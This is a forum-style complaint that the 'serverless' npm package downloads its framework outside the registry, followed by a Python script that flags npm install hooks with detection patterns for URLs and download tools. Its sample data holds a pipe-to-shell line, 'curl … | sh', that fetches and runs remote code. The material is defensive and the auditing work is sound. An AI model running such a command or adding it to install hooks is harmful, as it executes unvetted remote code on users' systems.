As far as I understand, the “serverless” package on npm doesn’t contain the framework itself; rather, it’s just a script that downloads a golang binary that, in turn, fetches https://install.serverless.com/versions.json to figure out the latest serverless version, then downloads it from https://install.serverless.com/archives/serverless-.tgz, and finally installs it to ~/.serverless
I see a few big downsides with this:
- It doesn’t respect package-lock.json
- It circumvents my private registry
- If install.serverless.com is down or inaccessible (e.g. I’d like my CI to have restrictive network access, for security reasons), then serverless doesn’t work anymore
My question is, why? From my perspective, it’s circumventing a bunch of security measures; what’s the upside?
Not only that, the aforementioned golang binary tends to fail with vague errors when a new version of serverless is released:
- exit status 1
- Error: runtime error: invalid memory address or nil pointer dereference
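One way to catch this class of package before it reaches CI is to audit npm lifecycle hooks (preinstall/install/postinstall/prepare) for commands that reach the network or hand off to an arbitrary script, since that is where a registry-bypassing download has to start. This is an added example, not code from the original post or from the serverless project; the package.json contents below are constructed to model the pattern described and do not reproduce the real serverless package.

```python
import json
import os
import re

# Lifecycle hooks that `npm install` runs automatically for a dependency.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics: a URL, a download tool, or a hand-off to a JS entry point
# (which can download anything once it runs, lockfile or not).
SUSPICIOUS = (
    re.compile(r"https?://", re.I),
    re.compile(r"\b(curl|wget|fetch)\b", re.I),
    re.compile(r"\bnode\s+\S+\.js\b"),
)


def audit_install_hooks(package_json_text: str) -> list:
    """Return one finding per lifecycle hook that could pull code at
    install time, bypassing package-lock.json and the private registry."""
    pkg = json.loads(package_json_text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        matched = [p.pattern for p in SUSPICIOUS if p.search(cmd)]
        if matched:
            findings.append({"package": pkg.get("name"), "hook": hook,
                             "command": cmd, "matched": matched})
    return findings


def scan_node_modules(root: str) -> list:
    """Walk an installed node_modules tree and audit every package.json."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                findings.extend(audit_install_hooks(fh.read()))
    return findings


# Constructed samples (hypothetical package names, not real registry entries).
SAMPLE_WRAPPER = json.dumps({"name": "example-wrapper", "version": "0.0.0",
                             "scripts": {"postinstall": "node ./scripts/fetch-binary.js"}})
SAMPLE_CURL = json.dumps({"name": "example-curl", "version": "0.0.0",
                          "scripts": {"preinstall": "curl -sSL https://example.invalid/get.sh | sh"}})
SAMPLE_PLAIN = json.dumps({"name": "example-lib", "version": "1.0.0", "main": "index.js"})
```

Run `scan_node_modules("node_modules")` after an install with `npm ci --ignore-scripts` to review hooks before letting them execute.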